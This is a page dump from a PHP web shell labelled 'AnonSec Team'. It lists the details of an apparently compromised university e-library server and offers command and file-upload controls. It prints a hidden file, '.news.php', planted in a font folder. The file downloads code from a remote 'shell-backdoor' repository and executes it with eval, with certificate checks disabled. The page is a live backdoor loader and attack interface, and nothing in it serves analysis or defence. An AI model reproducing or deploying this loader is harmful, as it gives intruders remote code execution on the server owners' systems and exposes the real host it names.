AnonSec Team
Server IP : 103.11.96.170  /  Your IP : 18.221.133.22
Web Server : Microsoft-IIS/10.0
System : Windows NT WIN-F6SLGVICLOP 10.0 build 17763 (Windows Server 2016) AMD64
User : elibrary.unsap.ac.id ( 0)
PHP Version : 7.4.19
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF
Directory (0555) :  D:/localhost/elibrary/repository/font/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : D:/localhost/elibrary/repository/font/.news.php
<?php


function getURL($url) {
    
    if(function_exists('curl_version')) {
        
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        $data = curl_exec($ch);
        curl_close($ch);
        return $data;
    }
}


eval("?>" . getURL("https://raw.githubusercontent.com/kelelawar-cyber-team/shell-backdoor/refs/heads/main/anon.txt"));

AnonSec - 2021